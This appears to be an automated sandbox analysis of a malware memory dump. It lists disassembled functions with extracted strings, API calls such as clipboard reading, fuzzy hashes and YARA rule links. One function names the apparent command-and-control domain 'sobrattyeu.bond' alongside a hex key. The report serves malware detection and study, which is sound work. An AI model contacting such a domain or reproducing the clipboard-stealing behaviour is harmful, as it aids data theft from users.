Function 00411B20 Relevance: 150.7, APIs: 4, Strings: 81, Instructions: 1908COMMON

Download Yara Rule

Strings

h, xrefs: 004133EC
n, xrefs: 004129BA
:, xrefs: 0041258B
B, xrefs: 0041335C
[, xrefs: 00412E37
C, xrefs: 00412DF7
k, xrefs: 0041343C
>, xrefs: 0041310B
a, xrefs: 00411D5E
3, xrefs: 0041309B
e, xrefs: 00412FAA
0, xrefs: 00412DCF
", xrefs: 004129B0
6, xrefs: 0041315B
i, xrefs: 00411C6E
1, xrefs: 004130AB
;, xrefs: 00412590
D, xrefs: 004135C3
Z, xrefs: 00412E2F
h, xrefs: 004127C3
>, xrefs: 004130FB
}, xrefs: 00411FEB
", xrefs: 004130DB
A, xrefs: 00412C12
K, xrefs: 00412DB7
U, xrefs: 0041338C
d, xrefs: 004127E3
W, xrefs: 004131AB
G, xrefs: 00412DD7
(, xrefs: 00412DFF
8, xrefs: 00412DAF
m, xrefs: 00412E0F
q, xrefs: 00411F00
m, xrefs: 00411DF4
,, xrefs: 0041308B
`, xrefs: 00411DF9
], xrefs: 004133CC
3, xrefs: 0041307B
g, xrefs: 0041347C
=, xrefs: 004127B3
x, xrefs: 0041348C
}, xrefs: 0041209C
j, xrefs: 00412E1F
S, xrefs: 00412228
!, xrefs: 0041314B
|, xrefs: 0041342C
d, xrefs: 00412FA5
E, xrefs: 00412DC7
3, xrefs: 00412502
6, xrefs: 00412DEF
D, xrefs: 0041382B
@, xrefs: 0041287E
u, xrefs: 004134BC
W, xrefs: 004133AC
#, xrefs: 004129CE
", xrefs: 0041316B
;, xrefs: 0041312B
X, xrefs: 0041339C
g, xrefs: 0041341C
\, xrefs: 0041317B
L, xrefs: 0041289E
`, xrefs: 00412AFE
Y, xrefs: 00412E27
Z, xrefs: 00412FAF
A, xrefs: 00412DE7
], xrefs: 00412E07
^, xrefs: 004133BC
w, xrefs: 004134AC
<, xrefs: 00412DDF
8, xrefs: 0041303B
A, xrefs: 0041337C
z, xrefs: 00411C69
9, xrefs: 00412586
, xrefs: 00411E7B
_, xrefs: 00412E17
J, xrefs: 0041288E
t, xrefs: 00411B81
V, xrefs: 004133DC
c, xrefs: 004129C4
[, xrefs: 0041336C
z, xrefs: 00412C17

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: $!$"$"$"$#$($,$0$1$3$3$3$6$6$8$8$9$:$;$;$<$=$>$>$@$A$A$A$B$C$D$D$E$G$J$K$L$S$U$V$W$W$X$Y$Z$Z$[$[$\$]$]$^$_$`$`$a$c$d$d$e$g$g$h$h$i$j$k$m$m$n$q$t$u$w$x$z$z$|$}$}
API String ID: 0-4160516955
Opcode ID: 344d0b235ddf6978be5e02e20e45f4d76b2bab130bcae2e2ee2ef5dbdc425e91
Instruction ID: 117aeaff4c6fbaf4157fdbc60f3db6fb52a806b9f41967a57c6fbeea88178428
Opcode Fuzzy Hash: 344d0b235ddf6978be5e02e20e45f4d76b2bab130bcae2e2ee2ef5dbdc425e91
Instruction Fuzzy Hash: D503D07160C7C18AD3349B3885443DFBBD1AB96324F188A6EE4E9973D2D7B88981C747

Function 0041CAA0 Relevance: 83.7, Strings: 66, Instructions: 1193COMMON

Download Yara Rule

Strings

\, xrefs: 0041D0EB
Q, xrefs: 0041CFBB
-, xrefs: 0041D63B
b, xrefs: 0041CE93
8, xrefs: 0041CD0E
D, xrefs: 0041CF93
a, xrefs: 0041CD18
P, xrefs: 0041CFCB
S, xrefs: 0041D053
/, xrefs: 0041CF9B
, xrefs: 0041D14B
H, xrefs: 0041D043
R, xrefs: 0041D05B
E, xrefs: 0041D103
., xrefs: 0041D143
,, xrefs: 0041D153
_, xrefs: 0041CFF3
b, xrefs: 0041D033
[, xrefs: 0041CFDB
q, xrefs: 0041CF83
0, xrefs: 0041D64A
A, xrefs: 0041D073
}, xrefs: 0041CF6B
V, xrefs: 0041D01B
&, xrefs: 0041CCF5
A, xrefs: 0041D093
u, xrefs: 0041D11B
&, xrefs: 0041CCFA
J, xrefs: 0041D0A3
b, xrefs: 0041CD13
G, xrefs: 0041D023
R, xrefs: 0041CE38
_, xrefs: 0041D0C3
H, xrefs: 0041D113
Y, xrefs: 0041CE60
J, xrefs: 0041D10B
G, xrefs: 0041DB13
s, xrefs: 0041D03B
T, xrefs: 0041CFE3
?, xrefs: 0041D645
f, xrefs: 0041D013
d, xrefs: 0041CFD3
0, xrefs: 0041CFEB
P, xrefs: 0041D0FB
H, xrefs: 0041D003
., xrefs: 0041D13B
N, xrefs: 0041D0E3
H, xrefs: 0041D0BB
P, xrefs: 0041CFB3
c, xrefs: 0041CD1D
O, xrefs: 0041D083
:, xrefs: 0041CD22
[, xrefs: 0041D02B
n, xrefs: 0041D07B
R, xrefs: 0041D09B
z, xrefs: 0041D0AB
%, xrefs: 0041CCF0
f, xrefs: 0041D00B
], xrefs: 0041D0B3
>, xrefs: 0041D640
\, xrefs: 0041CFC3
:, xrefs: 0041CFAB
X, xrefs: 0041D0CB
P, xrefs: 0041D0F3
7, xrefs: 0041D15B
$, xrefs: 0041CCFF

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: $$$%$&$&$,$-$.$.$/$0$0$7$8$:$:$>$?$A$A$D$E$G$G$H$H$H$H$J$J$N$O$P$P$P$P$Q$R$R$R$S$T$V$X$Y$[$[$\$\$]$_$_$a$b$b$b$c$d$f$f$n$q$s$u$z$}
API String ID: 0-3743354863
Opcode ID: 5e1ca8346b529f0a9eae92fbb8e2aae2df75031782f2171215637c8570fb2fc6
Instruction ID: 2205c5dd49912a15ade75e625562851e5fed45581a7bd861b37c18b6c067c818
Opcode Fuzzy Hash: 5e1ca8346b529f0a9eae92fbb8e2aae2df75031782f2171215637c8570fb2fc6
Instruction Fuzzy Hash: 4AB2BF7160C7C18BC3259A3C889439EBBD16BD6324F084B6EE4E98B3D2D7789845C797

Function 00422D17 Relevance: 71.6, Strings: 57, Instructions: 394COMMON

Download Yara Rule

Strings

^, xrefs: 00422E30
1, xrefs: 00422E74
, xrefs: 00422E64
., xrefs: 004230E3
M, xrefs: 004231A7
, xrefs: 00422E6C
8, xrefs: 00423153
y, xrefs: 00422DC4
I, xrefs: 00422E18
P, xrefs: 00423217
., xrefs: 00422E34
;, xrefs: 00423145
1, xrefs: 00422E78
", xrefs: 00422E40
^, xrefs: 00423241
`, xrefs: 00422D31
g, xrefs: 00422D5B
m, xrefs: 00422E4C
X, xrefs: 00423225
I, xrefs: 0042318B
r, xrefs: 00422D93
#, xrefs: 00422E60
#, xrefs: 00422F42
H, xrefs: 004231DF
?, xrefs: 00422E5C
", xrefs: 00422E68
v, xrefs: 00422D70
+, xrefs: 00422E48
O, xrefs: 00423199
~, xrefs: 00422D77
Q, xrefs: 004231ED
c, xrefs: 0042325D
,, xrefs: 004230F1
t, xrefs: 00422D8C
:, xrefs: 00422E58
<, xrefs: 00423129
#, xrefs: 00422E70
], xrefs: 00423209
w, xrefs: 00422D38
sobrattyeu.bond, xrefs: 00423437
+, xrefs: 00422D23
m, xrefs: 00422DF4
;, xrefs: 00422E50
t, xrefs: 00422D62
CF0E57EB70DF1D8FB960CC18D99B375A, xrefs: 00422FAF
N, xrefs: 00422E14
O, xrefs: 004231D1
{, xrefs: 00422D2A
2, xrefs: 0042316F
I, xrefs: 00423358
,, xrefs: 004230D5
!, xrefs: 00422E38
(, xrefs: 00422D3F
`, xrefs: 00422D4D
W, xrefs: 00422E1C
7, xrefs: 00422E44
~, xrefs: 00422D69

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: $ $!$"$"$#$#$#$($+$+$,$,$.$.$1$1$2$7$8$:$;$;$<$?$CF0E57EB70DF1D8FB960CC18D99B375A$H$I$I$I$M$N$O$O$P$Q$W$X$]$^$^$`$`$c$g$m$m$r$sobrattyeu.bond$t$t$v$w$y${$~$~
API String ID: 0-834209027
Opcode ID: d38c60a90824ad46133972e7c4cbed06e95cef7b7f0db34d98dc1f8cdee652d2
Instruction ID: cb64673b7a5c261b5fced673e82aa1e2275cc430e4e3ca242fe1a1f134c2d7d8
Opcode Fuzzy Hash: d38c60a90824ad46133972e7c4cbed06e95cef7b7f0db34d98dc1f8cdee652d2
Instruction Fuzzy Hash: EB220E11D0C7EA89DB32C67C9C4878DBF611B23224F0847D9D4E86B2D3D7790A86DB66

Function 00425E00 Relevance: 34.2, Strings: 27, Instructions: 430COMMON

Download Yara Rule

Strings

2{<u, xrefs: 00425F5A
G0]6, xrefs: 004265C9
T8e>, xrefs: 004265DF
;T&Z, xrefs: 0042662C
!h#n, xrefs: 00426663
x~, xrefs: 004267EF
U\, xrefs: 004261BC
K4l:, xrefs: 00426430
-tz, xrefs: 004264E0
_lYr, xrefs: 0042666E
.D)J, xrefs: 00426600
tj, xrefs: 00426810
T`Zf, xrefs: 0042664D
rp, xrefs: 00426051
|,X2, xrefs: 004265BE
o<KB, xrefs: 004265EA
.H>N, xrefs: 0042660B
`g, xrefs: 004261C7
4~|, xrefs: 00426314
(X6^, xrefs: 00426637
)p*v, xrefs: 004264D5
Rd"j, xrefs: 00426658
8>, xrefs: 0042689F
BpFv, xrefs: 00426679
7w, xrefs: 00425F65
{x, xrefs: 004264EB
&P%V, xrefs: 00426621

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
API String ID: 0-2870231824
Opcode ID: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
Instruction ID: e4eadb167d9284e983c6371bd9484b3f2b8716763c332f31a73ee98d54a9440e
Opcode Fuzzy Hash: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
Instruction Fuzzy Hash: E53209B160C7D48AD334CF14C442BDFBAF2EB92304F00892DC5E96B215D7B6564A8B9B

Function 004251E8 Relevance: 34.2, Strings: 27, Instructions: 426COMMON

Download Yara Rule

Strings

-tz, xrefs: 004258C0
x~, xrefs: 00425BCF
4~|, xrefs: 004256F4
U\, xrefs: 0042559C
{x, xrefs: 004258CB
&P%V, xrefs: 00425A01
2{<u, xrefs: 0042533A
T8e>, xrefs: 004259BF
.D)J, xrefs: 004259E0
(X6^, xrefs: 00425A17
8>, xrefs: 00425C7F
;T&Z, xrefs: 00425A0C
!h#n, xrefs: 00425A43
tj, xrefs: 00425BF0
K4l:, xrefs: 00425810
.H>N, xrefs: 004259EB
T`Zf, xrefs: 00425A2D
o<KB, xrefs: 004259CA
|,X2, xrefs: 0042599E
7w, xrefs: 00425345
rp, xrefs: 00425431
BpFv, xrefs: 00425A59
`g, xrefs: 004255A7
_lYr, xrefs: 00425A4E
G0]6, xrefs: 004259A9
)p*v, xrefs: 004258B5
Rd"j, xrefs: 00425A38

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
API String ID: 0-2870231824
Opcode ID: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
Instruction ID: 85683be32e8b5f4f428226e946852424525cd865b1790a78dd48afa17569a373
Opcode Fuzzy Hash: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
Instruction Fuzzy Hash: 423208B160C7D48AD334CF14C442BDFBAF2EB92304F40892DC5E96B215D7B6564A8B9B

Function 0043AEA0 Relevance: 22.9, Strings: 18, Instructions: 366COMMON

Download Yara Rule

Strings

!, xrefs: 0043B16F
Y, xrefs: 0043AEB9
X, xrefs: 0043AEB4
c, xrefs: 0043B233
Y, xrefs: 0043AF7B
6cxU, xrefs: 0043AEF8
[, xrefs: 0043AEAF
6, xrefs: 0043B11B
6cxU, xrefs: 0043AFC1
kyeE, xrefs: 0043B0B2
6cxU, xrefs: 0043AFBA
[, xrefs: 0043AF71
*, xrefs: 0043B120
X, xrefs: 0043AF76
J, xrefs: 0043B165
_, xrefs: 0043B16A
8, xrefs: 0043B116
6cxU, xrefs: 0043AEFF

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: !$*$6$6cxU$6cxU$6cxU$6cxU$8$J$X$X$Y$Y$[$[$_$c$kyeE
API String ID: 0-79597815
Opcode ID: fbbbd6998d66d1ff913caef885f0d1f43bf92717102f9addf7045befe193c24d
Instruction ID: 42706493f26dcfc1d10290e159ccbf824b4cb947979334a7fe4c2d294b2d1955
Opcode Fuzzy Hash: fbbbd6998d66d1ff913caef885f0d1f43bf92717102f9addf7045befe193c24d
Instruction Fuzzy Hash: B0C1482361CB914BD31888BD8C9425BEEC24BEA234F1D877DD9F5873C2D5AD89068396

Function 00415E42 Relevance: 16.8, APIs: 4, Strings: 5, Instructions: 1043COMMON

Download Yara Rule

Strings

LH, xrefs: 004165FD
[T, xrefs: 004163B4
AtP, xrefs: 0041663A
LH, xrefs: 0041638A
GpFv, xrefs: 00416633

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: AtP$GpFv$LH$LH$[T
API String ID: 0-1191849916
Opcode ID: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
Instruction ID: 4372fb21f11b9819d30698d9d45361d0369da0689afe6659426da76e72155524
Opcode Fuzzy Hash: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
Instruction Fuzzy Hash: C872F275600B01CFD724CF29C8917A3B7B2FF8A314B19896DD8968B7A1D739E842CB54

Function 004161DF Relevance: 16.5, APIs: 4, Strings: 5, Instructions: 726COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?,?,?,?,?,00000000,?), ref: 004164C7

Strings

LH, xrefs: 004165FD
[T, xrefs: 004163B4
AtP, xrefs: 0041663A
LH, xrefs: 0041638A
GpFv, xrefs: 00416633

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: AtP$GpFv$LH$LH$[T
API String ID: 237503144-1191849916
Opcode ID: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
Instruction ID: 33ac3c3fba2e5f2169ec6e70d98a4de6486b49fd6ba05196e176a44067b630e5
Opcode Fuzzy Hash: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
Instruction Fuzzy Hash: D83224756007018FC724CF29C8917A3B7F2FF96314B1A85ADD8968B7A1D739E842CB54

Function 00430050 Relevance: 14.6, Strings: 11, Instructions: 875COMMON

Download Yara Rule

Strings

$&C, xrefs: 0043098D
-C, xrefs: 004307A5
:/C, xrefs: 00430C52
u'C, xrefs: 004308F9
p+C, xrefs: 00430AD3
:/C, xrefs: 00430C68
B-C, xrefs: 0043094B
F1C, xrefs: 00430805
%!C, xrefs: 00430961
d/C, xrefs: 004308CD
d/C, xrefs: 004308E3

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: -C$$&C$%!C$:/C$:/C$B-C$F1C$d/C$d/C$p+C$u'C
API String ID: 0-709081256
Opcode ID: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
Instruction ID: d9a4a0d359dcb2b16ba7e2780f5c8e827f4dfc1ae0afff22db1dab9ef28774d1
Opcode Fuzzy Hash: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
Instruction Fuzzy Hash: 6792A6B0615B809FD3A1CF3DC841793BBE8AB1A301F14496EE1EED7342D775A9408B69

Function 004245C0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 217COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698

Strings

D6v4, xrefs: 00424655
=jh, xrefs: 00424622
}z, xrefs: 00424646

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: =jh$D6v4$}z
API String ID: 237503144-2424248051
Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96

Function 004363E0 Relevance: 9.1, APIs: 6, Instructions: 130clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436402
GetClipboardData.USER32 ref: 00436423
GlobalLock.KERNEL32 ref: 00436440
GlobalUnlock.KERNEL32 ref: 00436565
CloseClipboard.USER32 ref: 0043656D

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797

Function 004165EE Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 363COMMON

Download Yara Rule

Strings

LH, xrefs: 004165FD
AtP, xrefs: 0041663A
GpFv, xrefs: 00416633

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: AtP$GpFv$LH
API String ID: 0-40351562
Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44

Function 0043EE80 Relevance: 8.1, Strings: 6, Instructions: 616COMMON

Download Yara Rule

Strings

S"(w, xrefs: 0043EFA0
S"(w, xrefs: 0043F1F3
6G01, xrefs: 0043EF86, 0043EFC8
6G01, xrefs: 0043EF00
[XX^, xrefs: 0043F077, 0043F0E7
f, xrefs: 0043F12A

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID: 6G01$6G01$S"(w$S"(w$[XX^$f
API String ID: 2994545307-3115683409
Opcode ID: 61883efe96ca33c79856f788789606f753579e691f04b227c951374ef0c4db1f
Instruction ID: ebcf572aee061de9b4dc2af0cc781152135a947e19cbb5be78f8ae6f4a52bc66
Opcode Fuzzy Hash: 61883efe96ca33c79856f788789606f753579e691f04b227c951374ef0c4db1f
Instruction Fuzzy Hash: B5220571A083419FC714CF19C880A6BBBE2EBC9314F14863EE4A5573A2D375DD4A8B96

Function 00418690 Relevance: 7.9, APIs: 2, Strings: 2, Instructions: 893COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,0041755F), ref: 00418AD7
FreeLibrary.KERNEL32(?), ref: 00418B19

Part of subcall function 004402D0: LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE

Strings

^_, xrefs: 004189B2
fg$, xrefs: 00418715

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: ^_$fg$
API String ID: 764372645-722828377
Opcode ID: 525dacdd8ed04eb7e87f2a7af5946cb79993a09b420d20e0efd7fc82858eb55f
Instruction ID: 32a26824a101f77e2cdc0b8292c828813d5ce8b95ab05ea660f3df7b5e92ca69
Opcode Fuzzy Hash: 525dacdd8ed04eb7e87f2a7af5946cb79993a09b420d20e0efd7fc82858eb55f
Instruction Fuzzy Hash: A36223706083419BE724CB25CC947ABBBA2FFD5314F188A2DF195572E1D774DC828B8A

Function 00417451 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

R^lf, xrefs: 00417472
[NC~, xrefs: 00417480
puGG, xrefs: 00417479
KWYb, xrefs: 00417464
V]E^, xrefs: 0041746B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: KWYb$R^lf$V]E^$[NC~$puGG
API String ID: 0-3448173581
Opcode ID: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
Instruction ID: 136c07a549b812a85170c773b68f542c8dc67558d112d0f44613d1a83f6642fd
Opcode Fuzzy Hash: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
Instruction Fuzzy Hash: 18E16475608601DFC7248F29CC816A777B2FF8A310F19857ED5568B7A1E739E842CB48

Function 0040A910 Relevance: 6.7, Strings: 5, Instructions: 422COMMON

Download Yara Rule

Strings

~|, xrefs: 0040AA08
<, xrefs: 0040A9F8
C|, xrefs: 0040AA00
~Bzx, xrefs: 0040A922
WR, xrefs: 0040AB42

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: <$C|$WR$~Bzx$~|
API String ID: 0-1711356705
Opcode ID: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
Instruction ID: c242de3d159764505c2276e72245a45d8931141d93d3f41c6525b63a99f65b4f
Opcode Fuzzy Hash: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
Instruction Fuzzy Hash: 3BD1287664C3504BD318CF29885126FBBE3ABC2314F19897EE4D5AB381C779C90A8787

Function 004091C0 Relevance: 6.6, Strings: 5, Instructions: 382COMMON

Download Yara Rule

Strings

uP, xrefs: 00409323
R, xrefs: 004094C6
IIMC, xrefs: 00409303
}UW^, xrefs: 00409270
C]E[, xrefs: 0040956E

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: C]E[$IIMC$R$uP$}UW^
API String ID: 0-892063760
Opcode ID: 205ed248482d7a065e056c637e6f518a5e6eb8ae255233571312f867963e7cbf
Instruction ID: 6cbd51c0248f91b97843e71913ba0166c23e35ea759608a7bc928dd55ed2a06e
Opcode Fuzzy Hash: 205ed248482d7a065e056c637e6f518a5e6eb8ae255233571312f867963e7cbf
Instruction Fuzzy Hash: 7EB1D57164C3919AC3268F29849075BFFE09FD3754F0849ADE4D51B3C2D339894ACB9A

Function 0040AE60 Relevance: 5.5, Strings: 4, Instructions: 489COMMON

Download Yara Rule

Strings

4:, xrefs: 0040B0EF
>;, xrefs: 0040AF4D
06, xrefs: 0040B0E5
SpYv, xrefs: 0040B045

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: >;$SpYv$06$4:
API String ID: 0-3243906123
Opcode ID: 9236da7ddfd6fb07e582297a530c3c26716b54592089834dbe2b9dbe45865d1f
Instruction ID: ba3b2f4d1e4dad876d63f93e4022fe59a9fa94051f0befbaffaca00d2fa64594
Opcode Fuzzy Hash: 9236da7ddfd6fb07e582297a530c3c26716b54592089834dbe2b9dbe45865d1f
Instruction Fuzzy Hash: 4D0254B5140B00CFD3208F25D895B97BBF5FB8A318F058A2CD5AA4BB90D779A405CF95

Function 00420B10 Relevance: 5.5, Strings: 4, Instructions: 470COMMON

Download Yara Rule

Strings

745:2$76, xrefs: 00420C04
p@, xrefs: 00420F26
_\], xrefs: 00420CD6
2$76, xrefs: 00420BD5

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: 2$76$745:2$76$_\]$p@
API String ID: 0-2055486527
Opcode ID: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
Instruction ID: d14b64437fda7db03077973c55caa55540a0466a372fa5b5a151a26c722ec16b
Opcode Fuzzy Hash: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
Instruction Fuzzy Hash: 5CD1CF716183508FD724CF64D891BABBBF0EF95318F04882DE98587392E7B9E845CB46

Function 0042A810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D

Strings

~, xrefs: 0042A832

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ~
API String ID: 237503144-2894255414
Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47

Function 0042F799 Relevance: 5.4, Strings: 4, Instructions: 395COMMON

Download Yara Rule

Strings

$&?3, xrefs: 0042F9CF
;(?>, xrefs: 0042FB00
99C?, xrefs: 0042FB07
0-/?, xrefs: 0042F9D6

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: $&?3$0-/?$99C?$;(?>
API String ID: 0-2409071036
Opcode ID: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
Instruction ID: f66a5fe417f6b708e5f26068a280dd0292c096a76de8314330cd7006a92fc357
